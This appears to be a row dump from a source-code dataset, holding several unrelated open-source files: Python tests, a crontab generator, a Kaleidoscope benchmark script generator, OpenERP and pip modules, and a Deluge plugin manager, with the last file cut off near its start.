repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
turbokongen/home-assistant
|
tests/components/tasmota/test_mixins.py
|
8
|
1574
|
"""The tests for the Tasmota mixins."""
import copy
import json
from unittest.mock import call
from hatasmota.const import CONF_MAC
from hatasmota.utils import config_get_state_online, get_topic_tele_will
from homeassistant.components.tasmota.const import DEFAULT_PREFIX
from .test_common import DEFAULT_CONFIG
from tests.common import async_fire_mqtt_message
async def test_availability_poll_state_once(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test several entities send a single message to update state."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["swc"][0] = 1
config["swc"][1] = 1
poll_payload_relay = ""
poll_payload_switch = "10"
poll_topic_relay = "tasmota_49A3BC/cmnd/STATE"
poll_topic_switch = "tasmota_49A3BC/cmnd/STATUS"
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config",
json.dumps(config),
)
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Device online, verify poll for state
async_fire_mqtt_message(
hass,
get_topic_tele_will(config),
config_get_state_online(config),
)
await hass.async_block_till_done()
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.assert_has_calls(
[
call(poll_topic_relay, poll_payload_relay, 0, False),
call(poll_topic_switch, poll_payload_switch, 0, False),
],
any_order=True,
)
|
apache-2.0
|
mmmavis/lightbeam-bedrock-website
|
bin/crontab/gen-crons.py
|
70
|
1205
|
#!/usr/bin/env python
import os
from optparse import OptionParser
from jinja2 import Template
HEADER = '!!AUTO-GENERATED!! Edit bin/crontab/crontab.tpl instead.'
TEMPLATE = open(os.path.join(os.path.dirname(__file__), 'crontab.tpl')).read()
def main():
parser = OptionParser()
parser.add_option('-w', '--webapp',
help='Location of web app (required)')
parser.add_option('-u', '--user',
help=('Prefix cron with this user. '
'Only define for cron.d style crontabs.'))
parser.add_option('-p', '--python', default='/usr/bin/python2.6',
help='Python interpreter to use.')
(opts, args) = parser.parse_args()
if not opts.webapp:
parser.error('-w must be defined')
ctx = {'django': 'cd %s; %s manage.py' % (opts.webapp, opts.python)}
ctx['cron'] = '%s cron' % ctx['django']
if opts.user:
for k, v in ctx.iteritems():
ctx[k] = '%s %s' % (opts.user, v)
# Needs to stay below the opts.user injection.
ctx['python'] = opts.python
ctx['header'] = HEADER
print Template(TEMPLATE).render(**ctx)
if __name__ == '__main__':
main()
|
mpl-2.0
|
pspe/root
|
interpreter/llvm/src/examples/Kaleidoscope/MCJIT/complete/genk-timing.py
|
108
|
11103
|
#!/usr/bin/env python
import sys
import random
class TimingScriptGenerator:
"""Used to generate a bash script which will invoke the toy and time it"""
def __init__(self, scriptname, outputname):
self.timeFile = outputname
self.shfile = open(scriptname, 'w')
self.shfile.write("echo \"\" > %s\n" % self.timeFile)
def writeTimingCall(self, filename, numFuncs, funcsCalled, totalCalls):
"""Echo some comments and invoke both versions of toy"""
rootname = filename
if '.' in filename:
rootname = filename[:filename.rfind('.')]
self.shfile.write("echo \"%s: Calls %d of %d functions, %d total\" >> %s\n" % (filename, funcsCalled, numFuncs, totalCalls, self.timeFile))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With MCJIT (original)\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=true -enable-lazy-compilation=false < %s > %s-mcjit.out 2> %s-mcjit.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With MCJIT (lazy)\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=true -enable-lazy-compilation=true < %s > %s-mcjit-lazy.out 2> %s-mcjit-lazy.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"With JIT\" >> %s\n" % self.timeFile)
self.shfile.write("/usr/bin/time -f \"Command %C\\n\\tuser time: %U s\\n\\tsytem time: %S s\\n\\tmax set: %M kb\"")
self.shfile.write(" -o %s -a " % self.timeFile)
self.shfile.write("./toy -suppress-prompts -use-mcjit=false < %s > %s-jit.out 2> %s-jit.err\n" % (filename, rootname, rootname))
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
self.shfile.write("echo \"\" >> %s\n" % self.timeFile)
class KScriptGenerator:
"""Used to generate random Kaleidoscope code"""
def __init__(self, filename):
self.kfile = open(filename, 'w')
self.nextFuncNum = 1
self.lastFuncNum = None
self.callWeighting = 0.1
# A mapping of calls within functions with no duplicates
self.calledFunctionTable = {}
# A list of function calls which will actually be executed
self.calledFunctions = []
# A comprehensive mapping of calls within functions
# used for computing the total number of calls
self.comprehensiveCalledFunctionTable = {}
self.totalCallsExecuted = 0
def updateTotalCallCount(self, callee):
# Count this call
self.totalCallsExecuted += 1
# Then count all the functions it calls
if callee in self.comprehensiveCalledFunctionTable:
for child in self.comprehensiveCalledFunctionTable[callee]:
self.updateTotalCallCount(child)
def updateFunctionCallMap(self, caller, callee):
"""Maintains a map of functions that are called from other functions"""
if not caller in self.calledFunctionTable:
self.calledFunctionTable[caller] = []
if not callee in self.calledFunctionTable[caller]:
self.calledFunctionTable[caller].append(callee)
if not caller in self.comprehensiveCalledFunctionTable:
self.comprehensiveCalledFunctionTable[caller] = []
self.comprehensiveCalledFunctionTable[caller].append(callee)
def updateCalledFunctionList(self, callee):
"""Maintains a list of functions that will actually be called"""
# Update the total call count
self.updateTotalCallCount(callee)
# If this function is already in the list, don't do anything else
if callee in self.calledFunctions:
return
# Add this function to the list of those that will be called.
self.calledFunctions.append(callee)
# If this function calls other functions, add them too
if callee in self.calledFunctionTable:
for subCallee in self.calledFunctionTable[callee]:
self.updateCalledFunctionList(subCallee)
def setCallWeighting(self, weight):
""" Sets the probably of generating a function call"""
self.callWeighting = weight
def writeln(self, line):
self.kfile.write(line + '\n')
def writeComment(self, comment):
self.writeln('# ' + comment)
def writeEmptyLine(self):
self.writeln("")
def writePredefinedFunctions(self):
self.writeComment("Define ':' for sequencing: as a low-precedence operator that ignores operands")
self.writeComment("and just returns the RHS.")
self.writeln("def binary : 1 (x y) y;")
self.writeEmptyLine()
self.writeComment("Helper functions defined within toy")
self.writeln("extern putchard(x);")
self.writeln("extern printd(d);")
self.writeln("extern printlf();")
self.writeEmptyLine()
self.writeComment("Print the result of a function call")
self.writeln("def printresult(N Result)")
self.writeln(" # 'result('")
self.writeln(" putchard(114) : putchard(101) : putchard(115) : putchard(117) : putchard(108) : putchard(116) : putchard(40) :")
self.writeln(" printd(N) :");
self.writeln(" # ') = '")
self.writeln(" putchard(41) : putchard(32) : putchard(61) : putchard(32) :")
self.writeln(" printd(Result) :");
self.writeln(" printlf();")
self.writeEmptyLine()
def writeRandomOperation(self, LValue, LHS, RHS):
shouldCallFunc = (self.lastFuncNum > 2 and random.random() < self.callWeighting)
if shouldCallFunc:
funcToCall = random.randrange(1, self.lastFuncNum - 1)
self.updateFunctionCallMap(self.lastFuncNum, funcToCall)
self.writeln(" %s = func%d(%s, %s) :" % (LValue, funcToCall, LHS, RHS))
else:
possibleOperations = ["+", "-", "*", "/"]
operation = random.choice(possibleOperations)
if operation == "-":
# Don't let our intermediate value become zero
# This is complicated by the fact that '<' is our only comparison operator
self.writeln(" if %s < %s then" % (LHS, RHS))
self.writeln(" %s = %s %s %s" % (LValue, LHS, operation, RHS))
self.writeln(" else if %s < %s then" % (RHS, LHS))
self.writeln(" %s = %s %s %s" % (LValue, LHS, operation, RHS))
self.writeln(" else")
self.writeln(" %s = %s %s %f :" % (LValue, LHS, operation, random.uniform(1, 100)))
else:
self.writeln(" %s = %s %s %s :" % (LValue, LHS, operation, RHS))
def getNextFuncNum(self):
result = self.nextFuncNum
self.nextFuncNum += 1
self.lastFuncNum = result
return result
def writeFunction(self, elements):
funcNum = self.getNextFuncNum()
self.writeComment("Auto-generated function number %d" % funcNum)
self.writeln("def func%d(X Y)" % funcNum)
self.writeln(" var temp1 = X,")
self.writeln(" temp2 = Y,")
self.writeln(" temp3 in")
# Initialize the variable names to be rotated
first = "temp3"
second = "temp1"
third = "temp2"
# Write some random operations
for i in range(elements):
self.writeRandomOperation(first, second, third)
# Rotate the variables
temp = first
first = second
second = third
third = temp
self.writeln(" " + third + ";")
self.writeEmptyLine()
def writeFunctionCall(self):
self.writeComment("Call the last function")
arg1 = random.uniform(1, 100)
arg2 = random.uniform(1, 100)
self.writeln("printresult(%d, func%d(%f, %f) )" % (self.lastFuncNum, self.lastFuncNum, arg1, arg2))
self.writeEmptyLine()
self.updateCalledFunctionList(self.lastFuncNum)
def writeFinalFunctionCounts(self):
self.writeComment("Called %d of %d functions" % (len(self.calledFunctions), self.lastFuncNum))
def generateKScript(filename, numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting, timingScript):
""" Generate a random Kaleidoscope script based on the given parameters """
print "Generating " + filename
print(" %d functions, %d elements per function, %d functions between execution" %
(numFuncs, elementsPerFunc, funcsBetweenExec))
print(" Call weighting = %f" % callWeighting)
script = KScriptGenerator(filename)
script.setCallWeighting(callWeighting)
script.writeComment("===========================================================================")
script.writeComment("Auto-generated script")
script.writeComment(" %d functions, %d elements per function, %d functions between execution"
% (numFuncs, elementsPerFunc, funcsBetweenExec))
script.writeComment(" call weighting = %f" % callWeighting)
script.writeComment("===========================================================================")
script.writeEmptyLine()
script.writePredefinedFunctions()
funcsSinceLastExec = 0
for i in range(numFuncs):
script.writeFunction(elementsPerFunc)
funcsSinceLastExec += 1
if funcsSinceLastExec == funcsBetweenExec:
script.writeFunctionCall()
funcsSinceLastExec = 0
# Always end with a function call
if funcsSinceLastExec > 0:
script.writeFunctionCall()
script.writeEmptyLine()
script.writeFinalFunctionCounts()
funcsCalled = len(script.calledFunctions)
print " Called %d of %d functions, %d total" % (funcsCalled, numFuncs, script.totalCallsExecuted)
timingScript.writeTimingCall(filename, numFuncs, funcsCalled, script.totalCallsExecuted)
# Execution begins here
random.seed()
timingScript = TimingScriptGenerator("time-toy.sh", "timing-data.txt")
dataSets = [(5000, 3, 50, 0.50), (5000, 10, 100, 0.10), (5000, 10, 5, 0.10), (5000, 10, 1, 0.0),
(1000, 3, 10, 0.50), (1000, 10, 100, 0.10), (1000, 10, 5, 0.10), (1000, 10, 1, 0.0),
( 200, 3, 2, 0.50), ( 200, 10, 40, 0.10), ( 200, 10, 2, 0.10), ( 200, 10, 1, 0.0)]
# Generate the code
for (numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting) in dataSets:
filename = "test-%d-%d-%d-%d.k" % (numFuncs, elementsPerFunc, funcsBetweenExec, int(callWeighting * 100))
generateKScript(filename, numFuncs, elementsPerFunc, funcsBetweenExec, callWeighting, timingScript)
print "All done!"
|
lgpl-2.1
|
zsoltdudas/lis-tempest
|
tempest/api/object_storage/test_container_quotas.py
|
6
|
4590
|
# Copyright 2013 Cloudwatt
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.object_storage import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
QUOTA_BYTES = 10
QUOTA_COUNT = 3
class ContainerQuotasTest(base.BaseObjectTest):
"""Attempts to test the perfect behavior of quotas in a container."""
def setUp(self):
"""Creates and sets a container with quotas.
Quotas are set by adding meta values to the container,
and are validated when set:
- X-Container-Meta-Quota-Bytes:
Maximum size of the container, in bytes.
- X-Container-Meta-Quota-Count:
Maximum object count of the container.
"""
super(ContainerQuotasTest, self).setUp()
self.container_name = data_utils.rand_name(name="TestContainer")
self.container_client.create_container(self.container_name)
metadata = {"quota-bytes": str(QUOTA_BYTES),
"quota-count": str(QUOTA_COUNT), }
self.container_client.update_container_metadata(
self.container_name, metadata)
def tearDown(self):
"""Cleans the container of any object after each test."""
self.delete_containers([self.container_name])
super(ContainerQuotasTest, self).tearDown()
@test.idempotent_id('9a0fb034-86af-4df0-86fa-f8bd7db21ae0')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_valid_object(self):
"""Attempts to uploads an object smaller than the bytes quota."""
object_name = data_utils.rand_name(name="TestObject")
data = data_utils.arbitrary_string(QUOTA_BYTES)
nbefore = self._get_bytes_used()
resp, _ = self.object_client.create_object(
self.container_name, object_name, data)
self.assertHeaders(resp, 'Object', 'PUT')
nafter = self._get_bytes_used()
self.assertEqual(nbefore + len(data), nafter)
@test.idempotent_id('22eeeb2b-3668-4160-baef-44790f65a5a0')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_large_object(self):
"""Attempts to upload an object lagger than the bytes quota."""
object_name = data_utils.rand_name(name="TestObject")
data = data_utils.arbitrary_string(QUOTA_BYTES + 1)
nbefore = self._get_bytes_used()
self.assertRaises(lib_exc.OverLimit,
self.object_client.create_object,
self.container_name, object_name, data)
nafter = self._get_bytes_used()
self.assertEqual(nbefore, nafter)
@test.idempotent_id('3a387039-697a-44fc-a9c0-935de31f426b')
@test.requires_ext(extension='container_quotas', service='object')
@test.attr(type="smoke")
def test_upload_too_many_objects(self):
"""Attempts to upload many objects that exceeds the count limit."""
for _ in range(QUOTA_COUNT):
name = data_utils.rand_name(name="TestObject")
self.object_client.create_object(self.container_name, name, "")
nbefore = self._get_object_count()
self.assertEqual(nbefore, QUOTA_COUNT)
self.assertRaises(lib_exc.OverLimit,
self.object_client.create_object,
self.container_name, "OverQuotaObject", "")
nafter = self._get_object_count()
self.assertEqual(nbefore, nafter)
def _get_container_metadata(self):
resp, _ = self.container_client.list_container_metadata(
self.container_name)
return resp
def _get_object_count(self):
resp = self._get_container_metadata()
return int(resp["x-container-object-count"])
def _get_bytes_used(self):
resp = self._get_container_metadata()
return int(resp["x-container-bytes-used"])
|
apache-2.0
|
3dfxsoftware/cbss-addons
|
lunch/wizard/lunch_cancel.py
|
440
|
1274
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2012 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class lunch_cancel(osv.Model):
""" lunch cancel """
_name = 'lunch.cancel'
_description = 'cancel lunch order'
def cancel(self,cr,uid,ids,context=None):
return self.pool.get('lunch.order.line').cancel(cr, uid, ids, context=context)
|
gpl-2.0
|
florian-dacosta/OCB
|
addons/stock_picking_wave/__init__.py
|
374
|
1105
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_picking_wave
import wizard
import controllers
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
rmcgibbo/scipy
|
scipy/weave/examples/array3d.py
|
100
|
2521
|
""" A simple example to show how to access a 3D numpy array. One
example shows how to access the numpy array using blitz type
converters and the other shows how it can be done without using blitz
by accessing the numpy array data directly.
"""
from __future__ import absolute_import, print_function
import scipy.weave as weave
from scipy.weave import converters
import numpy
def create_array():
"""Creates a simple 3D numpy array with unique values at each
location in the matrix.
"""
rows, cols, depth = 2, 3, 4
arr = numpy.zeros((rows, cols, depth), 'i')
count = 0
for i in range(rows):
for j in range(cols):
for k in range(depth):
arr[i,j,k] = count
count += 1
return arr
def pure_inline(arr):
"""Prints the given 3D array by accessing the raw numpy data and
without using blitz converters.
Notice the following:
1. '\\n' to escape generating a newline in the C++ code.
2. rows, cols = Narr[0], Narr[1].
3. Array access using arr[(i*cols + j)*depth + k].
"""
code = """
int rows = Narr[0];
int cols = Narr[1];
int depth = Narr[2];
for (int i=0; i < rows; i++)
{
for (int j=0; j < cols; j++)
{
printf("img[%3d][%3d]=", i, j);
for (int k=0; k< depth; ++k)
{
printf(" %3d", arr[(i*cols + j)*depth + k]);
}
printf("\\n");
}
}
"""
weave.inline(code, ['arr'])
def blitz_inline(arr):
"""Prints the given 3D array by using blitz converters which
provides a numpy-like syntax for accessing the numpy data.
Notice the following:
1. '\\n' to escape generating a newline in the C++ code.
2. rows, cols = Narr[0], Narr[1].
3. Array access using arr(i, j, k).
"""
code = """
int rows = Narr[0];
int cols = Narr[1];
int depth = Narr[2];
for (int i=0; i < rows; i++)
{
for (int j=0; j < cols; j++)
{
printf("img[%3d][%3d]=", i, j);
for (int k=0; k< depth; ++k)
{
printf(" %3d", arr(i, j, k));
}
printf("\\n");
}
}
"""
weave.inline(code, ['arr'], type_converters=converters.blitz)
def main():
arr = create_array()
print("numpy:")
print(arr)
print("Pure Inline:")
pure_inline(arr)
print("Blitz Inline:")
blitz_inline(arr)
if __name__ == '__main__':
main()
|
bsd-3-clause
|
patriciolobos/desa8
|
openerp/addons/website_certification/__init__.py
|
385
|
1030
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import certification
import controllers
|
agpl-3.0
|
cdgallahue/atomic-turbine
|
web/lib/python2.7/site-packages/pip/commands/__init__.py
|
344
|
2244
|
"""
Package containing all pip commands
"""
from __future__ import absolute_import
from pip.commands.completion import CompletionCommand
from pip.commands.download import DownloadCommand
from pip.commands.freeze import FreezeCommand
from pip.commands.hash import HashCommand
from pip.commands.help import HelpCommand
from pip.commands.list import ListCommand
from pip.commands.check import CheckCommand
from pip.commands.search import SearchCommand
from pip.commands.show import ShowCommand
from pip.commands.install import InstallCommand
from pip.commands.uninstall import UninstallCommand
from pip.commands.wheel import WheelCommand
commands_dict = {
CompletionCommand.name: CompletionCommand,
FreezeCommand.name: FreezeCommand,
HashCommand.name: HashCommand,
HelpCommand.name: HelpCommand,
SearchCommand.name: SearchCommand,
ShowCommand.name: ShowCommand,
InstallCommand.name: InstallCommand,
UninstallCommand.name: UninstallCommand,
DownloadCommand.name: DownloadCommand,
ListCommand.name: ListCommand,
CheckCommand.name: CheckCommand,
WheelCommand.name: WheelCommand,
}
commands_order = [
InstallCommand,
DownloadCommand,
UninstallCommand,
FreezeCommand,
ListCommand,
ShowCommand,
CheckCommand,
SearchCommand,
WheelCommand,
HashCommand,
CompletionCommand,
HelpCommand,
]
def get_summaries(ordered=True):
"""Yields sorted (command name, command summary) tuples."""
if ordered:
cmditems = _sort_commands(commands_dict, commands_order)
else:
cmditems = commands_dict.items()
for name, command_class in cmditems:
yield (name, command_class.summary)
def get_similar_commands(name):
"""Command name auto-correct."""
from difflib import get_close_matches
name = name.lower()
close_commands = get_close_matches(name, commands_dict.keys())
if close_commands:
return close_commands[0]
else:
return False
def _sort_commands(cmddict, order):
def keyfn(key):
try:
return order.index(key[1])
except ValueError:
# unordered items should come last
return 0xff
return sorted(cmddict.items(), key=keyfn)
|
mit
|
altai/altai-api
|
tests/basic.py
|
1
|
4377
|
# vim: tabstop=8 shiftwidth=4 softtabstop=4 expandtab smarttab autoindent
# Altai API Service
# Copyright (C) 2012-2013 Grid Dynamics Consulting Services, Inc
# All Rights Reserved
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import sys
import unittest
from flask import g, json
from flask.exceptions import HTTPException
from altai_api import auth
from altai_api import exceptions as exc
from altai_api.main import make_app
class TestCase(unittest.TestCase):
FAKE_AUTH = True
# by default, pretend to be admin
IS_ADMIN = True
def _fake_client_set_factory(self):
class _Fake(object):
master = self
return _Fake()
def install_fake_auth(self, *args_):
if not hasattr(self, 'fake_client_set'):
self.fake_client_set = self._fake_client_set_factory()
g.client_set = self.fake_client_set
g.admin_client_set = self.fake_client_set
g.is_admin = self.IS_ADMIN
g.my_projects = not self.IS_ADMIN
return None
def setUp(self):
super(TestCase, self).setUp()
self.app = make_app(None)
self.app.config['AUDIT_VERBOSITY'] = 0
self.client = self.app.test_client()
if self.FAKE_AUTH:
self.fake_client_set = self._fake_client_set_factory()
self.__require_auth = auth.require_auth
auth.require_auth = self.install_fake_auth
def tearDown(self):
if hasattr(self, 'fake_client_set'):
del self.fake_client_set
if self.FAKE_AUTH:
auth.require_auth = self.__require_auth
def assertAborts(self, status_code, callable_obj, *args, **kwargs):
"""Check that callable raises HTTP exception with given code"""
try:
callable_obj(*args, **kwargs)
except HTTPException, ex:
self.assertEquals(ex.code, status_code,
"Bad HTTP status code: expected %s, got %s"
% (status_code, ex.code))
return ex
except exc.AltaiApiException, ex:
self.assertEquals(ex.status_code, status_code,
"Bad HTTP status code: expected %s, got %s"
% (status_code, ex.status_code))
return ex
else:
self.fail("HTTPException was not raised")
def check_and_parse_response(self, resp, status_code=200,
authenticated=True):
try:
if resp.data:
data = json.loads(resp.data)
else:
data = None
except Exception:
self.fail('Invalid response data: %r' % resp.data)
self.assertEquals(resp.status_code, status_code,
'Expected HTTP response %s but got %s, with: %s' % (
status_code, resp.status_code,
json.dumps(data, indent=4, sort_keys=True)))
self.assertEquals(resp.content_type, 'application/json')
if authenticated:
self.assertTrue('X-GD-Altai-Implementation' in resp.headers)
else:
self.assertTrue('X-GD-Altai-Implementation' not in resp.headers)
if status_code == 204:
self.assertEquals(data, None)
return data
class ContextWrappedTestCase(TestCase):
"""Wraps all tests with request context"""
def setUp(self):
super(ContextWrappedTestCase, self).setUp()
self.__context = self.app.test_request_context()
self.__context.__enter__()
if self.FAKE_AUTH:
self.install_fake_auth()
def tearDown(self):
self.__context.__exit__(*sys.exc_info())
super(ContextWrappedTestCase, self).tearDown()
|
lgpl-2.1
|
s0undt3ch/Deluge
|
deluge/pluginmanagerbase.py
|
8
|
7806
|
#
# pluginmanagerbase.py
#
# Copyright (C) 2007 Andrew Resch <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
"""PluginManagerBase"""
import os.path
import logging
import pkg_resources
import deluge.common
import deluge.configmanager
import deluge.component as component
log = logging.getLogger(__name__)
METADATA_KEYS = [
"Name",
"License",
"Author",
"Home-page",
"Summary",
"Platform",
"Version",
"Author-email",
"Description",
]
DEPRECATION_WARNING = """
The plugin %s is not using the "deluge.plugins" namespace.
In order to avoid package name clashes between regular python packages and
deluge plugins, the way deluge plugins should be created has changed.
If you're seeing this message and you're not the developer of the plugin which
triggered this warning, please report to it's author.
If you're the developer, please take a look at the plugins hosted on deluge's
git repository to have an idea of what needs to be changed.
"""
class PluginManagerBase:
"""PluginManagerBase is a base class for PluginManagers to inherit"""
def __init__(self, config_file, entry_name):
log.debug("Plugin manager init..")
self.config = deluge.configmanager.ConfigManager(config_file)
# Create the plugins folder if it doesn't exist
if not os.path.exists(os.path.join(deluge.configmanager.get_config_dir(), "plugins")):
os.mkdir(os.path.join(deluge.configmanager.get_config_dir(), "plugins"))
# This is the entry we want to load..
self.entry_name = entry_name
# Loaded plugins
self.plugins = {}
# Scan the plugin folders for plugins
self.scan_for_plugins()
def enable_plugins(self):
# Load plugins that are enabled in the config.
for name in self.config["enabled_plugins"]:
self.enable_plugin(name)
def disable_plugins(self):
# Disable all plugins that are enabled
for key in self.plugins.keys():
self.disable_plugin(key)
def __getitem__(self, key):
return self.plugins[key]
def get_available_plugins(self):
"""Returns a list of the available plugins name"""
return self.available_plugins
def get_enabled_plugins(self):
"""Returns a list of enabled plugins"""
return self.plugins.keys()
def scan_for_plugins(self):
"""Scans for available plugins"""
base_plugin_dir = deluge.common.resource_filename("deluge", "plugins")
pkg_resources.working_set.add_entry(base_plugin_dir)
user_plugin_dir = os.path.join(deluge.configmanager.get_config_dir(), "plugins")
plugins_dirs = [base_plugin_dir]
for dirname in os.listdir(base_plugin_dir):
plugin_dir = os.path.join(base_plugin_dir, dirname)
pkg_resources.working_set.add_entry(plugin_dir)
plugins_dirs.append(plugin_dir)
pkg_resources.working_set.add_entry(user_plugin_dir)
plugins_dirs.append(user_plugin_dir)
self.pkg_env = pkg_resources.Environment(plugins_dirs)
self.available_plugins = []
for name in self.pkg_env:
log.debug("Found plugin: %s %s at %s",
self.pkg_env[name][0].project_name,
self.pkg_env[name][0].version,
self.pkg_env[name][0].location)
self.available_plugins.append(self.pkg_env[name][0].project_name)
def enable_plugin(self, plugin_name):
"""Enables a plugin"""
if plugin_name not in self.available_plugins:
log.warning("Cannot enable non-existant plugin %s", plugin_name)
return
if plugin_name in self.plugins:
log.warning("Cannot enable already enabled plugin %s", plugin_name)
return
plugin_name = plugin_name.replace(" ", "-")
egg = self.pkg_env[plugin_name][0]
egg.activate()
for name in egg.get_entry_map(self.entry_name):
entry_point = egg.get_entry_info(self.entry_name, name)
try:
cls = entry_point.load()
instance = cls(plugin_name.replace("-", "_"))
except Exception, e:
log.error("Unable to instantiate plugin %r from %r!",
name, egg.location)
log.exception(e)
continue
instance.enable()
if not instance.__module__.startswith("deluge.plugins."):
import warnings
warnings.warn_explicit(
DEPRECATION_WARNING % name,
DeprecationWarning,
instance.__module__, 0
)
if self._component_state == "Started":
component.start([instance.plugin._component_name])
plugin_name = plugin_name.replace("-", " ")
self.plugins[plugin_name] = instance
if plugin_name not in self.config["enabled_plugins"]:
log.debug("Adding %s to enabled_plugins list in config",
plugin_name)
self.config["enabled_plugins"].append(plugin_name)
log.info("Plugin %s enabled..", plugin_name)
def disable_plugin(self, name):
"""Disables a plugin"""
try:
self.plugins[name].disable()
component.deregister(self.plugins[name].plugin)
del self.plugins[name]
self.config["enabled_plugins"].remove(name)
except KeyError:
log.warning("Plugin %s is not enabled..", name)
log.info("Plugin %s disabled..", name)
def get_plugin_info(self, name):
"""Returns a dictionary of plugin info from the metadata"""
info = {}.fromkeys(METADATA_KEYS)
last_header = ""
cont_lines = []
for line in self.pkg_env[name][0].get_metadata("PKG-INFO").splitlines():
if not line:
continue
if line[0] in ' \t' and (len(line.split(":", 1)) == 1 or line.split(":", 1)[0] not in info.keys()):
# This is a continuation
cont_lines.append(line.strip())
else:
if cont_lines:
info[last_header] = "\n".join(cont_lines).strip()
cont_lines = []
if line.split(":", 1)[0] in info.keys():
last_header = line.split(":", 1)[0]
info[last_header] = line.split(":", 1)[1].strip()
return info
|
gpl-3.0
|
freeitaly/Trading-System
|
vn.sgit/pyscript/generate_struct.py
|
18
|
1965
|
# encoding: UTF-8
__author__ = 'CHENXY'
from sgit_data_type import *
import re
def main():
"""主函数"""
fcpp = open('SgitFtdcUserApiStruct.h', 'r')
